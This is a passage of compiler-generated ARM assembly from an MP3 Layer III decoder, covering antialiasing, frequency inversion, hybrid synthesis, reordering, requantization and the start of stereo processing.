lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-36] sub r3, r2, r3 sub r3, r3, #1 str r3, [fp, #-28] ldr r2, [fp, #-40] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-36] add r3, r3, r2 str r3, [fp, #-24] ldr r0, .L288+4 ldr r3, [fp, #-52] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-28] add r3, r2, r3 add r3, r3, #228 ldr r2, [r0, r3, lsl #2] @ float ldr r1, .L288+8 ldr r3, [fp, #-36] ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 mov r4, r3 ldr r0, .L288+4 ldr r3, [fp, #-52] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-24] add r3, r2, r3 add r3, r3, #228 ldr r2, [r0, r3, lsl #2] @ float ldr r1, .L288+12 ldr r3, [fp, #-36] ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 mov r1, r3 mov r0, r4 bl __aeabi_fsub mov r3, r0 str r3, [fp, #-20] @ float ldr r0, .L288+4 ldr r3, [fp, #-52] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-24] add r3, r2, r3 add r3, r3, #228 ldr r2, [r0, r3, lsl #2] @ float ldr r1, .L288+8 ldr r3, [fp, #-36] ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 mov r4, r3 ldr r0, .L288+4 ldr r3, [fp, #-52] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-28] add r3, r2, r3 add r3, r3, #228 ldr r2, [r0, r3, lsl #2] @ float ldr r1, .L288+12 ldr r3, [fp, #-36] ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 mov r1, r3 mov r0, r4 bl __aeabi_fadd mov r3, r0 str r3, [fp, #-16] @ float ldr r0, .L288+4 ldr r3, [fp, #-52] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-28] add r3, r2, r3 add r3, r3, #228 ldr r2, [fp, #-20] @ float str r2, [r0, r3, lsl #2] @ float ldr r0, .L288+4 ldr r3, [fp, #-52] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-24] add r3, r2, r3 add r3, r3, #228 ldr r2, [fp, #-16] @ float str r2, [r0, r3, lsl #2] @ float ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L284: ldr r3, [fp, #-36] cmp r3, #7 bls .L285 ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L283: ldr r2, [fp, #-40] ldr r3, [fp, #-32] cmp r2, r3 bcc .L286 b .L278 .L287: nop .L278: sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L289: .align 2 .L288: .word g_side_info .word g_main_data .word cs .word ca .size L3_Antialias, .-L3_Antialias .align 2 .syntax unified .arm .fpu softvfp .type L3_Frequency_Inversion, %function L3_Frequency_Inversion: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #1 str r3, [fp, #-12] b .L291 .L294: mov r3, #1 str r3, [fp, #-8] b .L292 .L293: ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-8] add r0, r2, r3 ldr ip, .L296 ldr r3, [fp, #-20] ldr r1, [fp, #-16] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r0 add r3, r3, #228 ldr r1, [ip, r3, lsl #2] @ float ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-8] add ip, r2, r3 eor r0, r1, #-2147483648 ldr lr, .L296 ldr r3, [fp, #-20] ldr r1, [fp, #-16] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, ip add r3, r3, #228 str r0, [lr, r3, lsl #2] @ float ldr r3, [fp, #-8] add r3, r3, #2 str r3, [fp, #-8] .L292: ldr r3, [fp, #-8] cmp r3, #17 bls .L293 ldr r3, [fp, #-12] add r3, r3, #2 str r3, [fp, #-12] .L291: ldr r3, [fp, #-12] cmp r3, #31 bls .L294 nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L297: .align 2 .L296: .word g_main_data .size L3_Frequency_Inversion, .-L3_Frequency_Inversion .section .rodata .align 2 .LC17: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type L3_Hybrid_Synthesis, %function L3_Hybrid_Synthesis: @ args = 0, pretend = 0, frame = 176 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #180 str r0, [fp, #-184] str r1, [fp, #-188] ldr r3, .L315 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r3, .L315+4 ldr r3, [r3] cmp r3, #0 beq .L299 mov r3, #0 str r3, [fp, #-168] b .L300 .L305: mov r3, #0 str r3, [fp, #-176] b .L301 .L304: mov r3, #0 str r3, [fp, #-172] b .L302 .L303: ldr r0, .L315+8 ldr r3, [fp, #-176] ldr r1, [fp, #-168] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #1 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #6 add r2, r2, r3 ldr r3, [fp, #-172] add r3, r2, r3 mov r2, #0 str r2, [r0, r3, lsl #2] @ float ldr r3, [fp, #-172] add r3, r3, #1 str r3, [fp, #-172] .L302: ldr r3, [fp, #-172] cmp r3, #17 bls .L303 ldr r3, [fp, #-176] add r3, r3, #1 str r3, [fp, #-176] .L301: ldr r3, [fp, #-176] cmp r3, #31 bls .L304 ldr r3, [fp, #-168] add r3, r3, #1 str r3, [fp, #-168] .L300: ldr r3, [fp, #-168] cmp r3, #1 bls .L305 ldr r3, .L315+4 mov r2, #0 str r2, [r3] .L299: mov r3, #0 str r3, [fp, #-176] b .L306 .L312: ldr r1, .L315+12 ldr r3, [fp, #-184] lsl r2, r3, #1 ldr r3, [fp, #-188] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L307 ldr r1, .L315+12 ldr r3, [fp, #-184] lsl r2, r3, #1 ldr r3, [fp, #-188] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L307 ldr r3, [fp, #-176] cmp r3, #1 bls .L308 .L307: ldr r1, .L315+12 ldr r3, [fp, #-184] lsl r2, r3, #1 ldr r3, [fp, #-188] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] b .L309 .L308: mov r3, #0 .L309: str r3, [fp, #-164] ldr r2, [fp, #-176] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #1 mov r0, r3 ldr r3, [fp, #-188] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 ldr r1, [fp, #-184] mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r0 add r3, r3, #228 lsl r3, r3, #2 ldr r2, .L315+16 add r3, r3, r2 sub r1, fp, #160 ldr r2, [fp, #-164] mov r0, r3 bl IMDCT_Win mov r3, #0 str r3, [fp, #-172] b .L310 .L311: ldr r3, [fp, #-172] lsl r3, r3, #2 sub r2, fp, #12 add r3, r2, r3 ldr r0, [r3, #-148] @ float ldr ip, .L315+8 ldr r3, [fp, #-176] ldr r1, [fp, #-188] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #1 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #6 add r2, r2, r3 ldr r3, [fp, #-172] add r3, r2, r3 ldr r1, [ip, r3, lsl #2] @ float ldr r2, [fp, #-176] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-172] add r4, r2, r3 bl __aeabi_fadd mov r3, r0 mov ip, r3 ldr r0, .L315+16 ldr r3, [fp, #-188] ldr r1, [fp, #-184] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r4 add r3, r3, #228 str ip, [r0, r3, lsl #2] @ float ldr r3, [fp, #-172] add r3, r3, #18 lsl r3, r3, #2 sub r2, fp, #12 add r3, r2, r3 ldr r0, [r3, #-148] @ float ldr ip, .L315+8 ldr r3, [fp, #-176] ldr r1, [fp, #-188] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #1 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #6 add r2, r2, r3 ldr r3, [fp, #-172] add r3, r2, r3 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-172] add r3, r3, #1 str r3, [fp, #-172] .L310: ldr r3, [fp, #-172] cmp r3, #17 bls .L311 ldr r3, [fp, #-176] add r3, r3, #1 str r3, [fp, #-176] .L306: ldr r3, [fp, #-176] cmp r3, #31 bls .L312 nop ldr r3, .L315 ldr r2, [r3] ldr r3, [fp, #-16] eors r2, r3, r2 mov r3, #0 beq .L314 bl __stack_chk_fail .L314: sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L316: .align 2 .L315: .word .LC17 .word hsynth_init .word store.7664 .word g_side_info .word g_main_data .size L3_Hybrid_Synthesis, .-L3_Hybrid_Synthesis .section .rodata .align 2 .LC18: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type L3_Reorder, %function L3_Reorder: @ args = 0, pretend = 0, frame = 2344 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #2336 sub sp, sp, #8 str r0, [fp, #-2344] str r1, [fp, #-2348] ldr r3, .L340 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, .L340+4 ldr r3, [r3, #16] str r3, [fp, #-2316] ldr r1, .L340+8 ldr r3, [fp, #-2344] lsl r2, r3, #1 ldr r3, [fp, #-2348] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L338 ldr r1, .L340+8 ldr r3, [fp, #-2344] lsl r2, r3, #1 ldr r3, [fp, #-2348] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L338 ldr r1, .L340+8 ldr r3, [fp, #-2344] lsl r2, r3, #1 ldr r3, [fp, #-2348] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L319 mov r3, #3 b .L320 .L319: mov r3, #0 .L320: str r3, [fp, #-2328] ldr r3, [fp, #-2328] add r1, r3, #1 ldr r0, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 str r3, [fp, #-2332] ldr r3, [fp, #-2328] add r1, r3, #1 ldr r0, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-2328] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-2324] ldr r3, [fp, #-2328] cmp r3, #0 bne .L321 mov r3, #0 b .L322 .L321: mov r3, #36 .L322: str r3, [fp, #-2340] b .L323 .L333: ldr r2, [fp, #-2340] ldr r3, [fp, #-2332] cmp r2, r3 bne .L324 mov r3, #0 str r3, [fp, #-2336] b .L325 .L326: ldr r1, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-2328] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r1, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r3, [fp, #-2336] add ip, r2, r3 ldr r3, [fp, #-2336] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r0, [r3, #-2308] @ float ldr lr, .L340+16 ldr r3, [fp, #-2348] ldr r1, [fp, #-2344] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, ip add r3, r3, #228 str r0, [lr, r3, lsl #2] @ float ldr r3, [fp, #-2336] add r3, r3, #1 str r3, [fp, #-2336] .L325: ldr r2, [fp, #-2324] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-2336] cmp r2, r3 bcc .L326 ldr r1, .L340+8 ldr r3, [fp, #-2344] lsl r2, r3, #1 ldr r3, [fp, #-2348] add r3, r2, r3 add r3, r3, #82 ldr r3, [r1, r3, lsl #2] ldr r2, [fp, #-2340] cmp r2, r3 bcs .L339 ldr r3, [fp, #-2328] add r3, r3, #1 str r3, [fp, #-2328] ldr r3, [fp, #-2328] add r1, r3, #1 ldr r0, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 str r3, [fp, #-2332] ldr r3, [fp, #-2328] add r1, r3, #1 ldr r0, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-2328] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-2324] .L324: mov r3, #0 str r3, [fp, #-2320] b .L329 .L332: mov r3, #0 str r3, [fp, #-2336] b .L330 .L331: ldr r2, [fp, #-2336] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r3, [fp, #-2320] add r0, r2, r3 ldr ip, .L340+16 ldr r3, [fp, #-2348] ldr r1, [fp, #-2344] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-2340] add r3, r2, r3 add r3, r3, #228 ldr r2, [ip, r3, lsl #2] @ float lsl r3, r0, #2 sub r1, fp, #4 add r3, r1, r3 str r2, [r3, #-2308] @ float ldr r3, [fp, #-2340] add r3, r3, #1 str r3, [fp, #-2340] ldr r3, [fp, #-2336] add r3, r3, #1 str r3, [fp, #-2336] .L330: ldr r2, [fp, #-2336] ldr r3, [fp, #-2324] cmp r2, r3 bcc .L331 ldr r3, [fp, #-2320] add r3, r3, #1 str r3, [fp, #-2320] .L329: ldr r3, [fp, #-2320] cmp r3, #2 bls .L332 .L323: ldr r3, [fp, #-2340] cmp r3, #576 bcc .L333 mov r3, #0 str r3, [fp, #-2336] b .L334 .L335: ldr r1, .L340+12 ldr r2, [fp, #-2316] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #2 add r3, r1, r3 add r3, r3, #140 ldr r2, [r3] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r3, [fp, #-2336] add ip, r2, r3 ldr r3, [fp, #-2336] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r0, [r3, #-2308] @ float ldr lr, .L340+16 ldr r3, [fp, #-2348] ldr r1, [fp, #-2344] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, ip add r3, r3, #228 str r0, [lr, r3, lsl #2] @ float ldr r3, [fp, #-2336] add r3, r3, #1 str r3, [fp, #-2336] .L334: ldr r2, [fp, #-2324] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-2336] cmp r2, r3 bcc .L335 .L338: nop b .L317 .L339: nop .L317: ldr r3, .L340 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L337 bl __stack_chk_fail .L337: sub sp, fp, #4 @ sp needed pop {fp, pc} .L341: .align 2 .L340: .word .LC18 .word g_frame_header .word g_side_info .word g_sf_band_indices .word g_main_data .size L3_Reorder, .-L3_Reorder .align 2 .syntax unified .arm .fpu softvfp .type L3_Requantize, %function L3_Requantize: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #48 str r0, [fp, #-40] str r1, [fp, #-44] ldr r3, .L368 ldr r3, [r3, #16] str r3, [fp, #-8] ldr r1, .L368+4 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L343 ldr r1, .L368+4 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L343 ldr r1, .L368+4 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L344 mov r3, #0 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-28] mov r3, #0 str r3, [fp, #-24] b .L345 .L347: ldr r2, [fp, #-24] ldr r3, [fp, #-28] cmp r2, r3 bne .L346 ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-28] .L346: ldr r3, [fp, #-32] ldr r2, [fp, #-24] ldr r1, [fp, #-44] ldr r0, [fp, #-40] bl Requantize_Process_Long ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L345: ldr r3, [fp, #-24] cmp r3, #35 bls .L347 mov r3, #3 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-32] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-12] mov r3, #36 str r3, [fp, #-24] b .L348 .L354: ldr r2, [fp, #-24] ldr r3, [fp, #-28] cmp r2, r3 bne .L349 ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-32] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-12] .L349: mov r3, #0 str r3, [fp, #-16] b .L350 .L353: mov r3, #0 str r3, [fp, #-20] b .L351 .L352: ldr r3, [fp, #-16] str r3, [sp] ldr r3, [fp, #-32] ldr r2, [fp, #-24] ldr r1, [fp, #-44] ldr r0, [fp, #-40] bl Requantize_Process_Short ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L351: ldr r2, [fp, #-20] ldr r3, [fp, #-12] cmp r2, r3 bcc .L352 ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L350: ldr r3, [fp, #-16] cmp r3, #2 bls .L353 .L348: ldr r1, .L368+4 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #82 ldr r3, [r1, r3, lsl #2] ldr r2, [fp, #-24] cmp r2, r3 bcc .L354 b .L363 .L344: mov r3, #0 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-32] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-24] b .L356 .L362: ldr r2, [fp, #-24] ldr r3, [fp, #-28] cmp r2, r3 bne .L357 ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r1, [r3, #4] ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-32] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r0, r3 ldr r3, [r3, #4] sub r3, r1, r3 str r3, [fp, #-12] .L357: mov r3, #0 str r3, [fp, #-16] b .L358 .L361: mov r3, #0 str r3, [fp, #-20] b .L359 .L360: ldr r3, [fp, #-16] str r3, [sp] ldr r3, [fp, #-32] ldr r2, [fp, #-24] ldr r1, [fp, #-44] ldr r0, [fp, #-40] bl Requantize_Process_Short ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L359: ldr r2, [fp, #-20] ldr r3, [fp, #-12] cmp r2, r3 bcc .L360 ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L358: ldr r3, [fp, #-16] cmp r3, #2 bls .L361 .L356: ldr r1, .L368+4 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #82 ldr r3, [r1, r3, lsl #2] ldr r2, [fp, #-24] cmp r2, r3 bcc .L362 b .L363 .L343: mov r3, #0 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-28] mov r3, #0 str r3, [fp, #-24] b .L364 .L366: ldr r2, [fp, #-24] ldr r3, [fp, #-28] cmp r2, r3 bne .L365 ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] ldr r3, [fp, #-32] add r1, r3, #1 ldr r0, .L368+8 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-28] .L365: ldr r3, [fp, #-32] ldr r2, [fp, #-24] ldr r1, [fp, #-44] ldr r0, [fp, #-40] bl Requantize_Process_Long ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L364: ldr r1, .L368+4 ldr r3, [fp, #-40] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #82 ldr r3, [r1, r3, lsl #2] ldr r2, [fp, #-24] cmp r2, r3 bcc .L366 .L363: nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L369: .align 2 .L368: .word g_frame_header .word g_side_info .word g_sf_band_indices .size L3_Requantize, .-L3_Requantize .align 2 .syntax unified .arm .fpu softvfp .type L3_Stereo, %function L3_Stereo: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 str r0, [fp, #-32] ldr r3, .L393 ldr r3, [r3, #28] cmp r3, #1 bne .L392 ldr r3, .L393 ldr r3, [r3, #32] cmp r3, #0 beq .L392 ldr r3, .L393 ldr r3, [r3, #32] and r3, r3, #2 cmp r3, #0 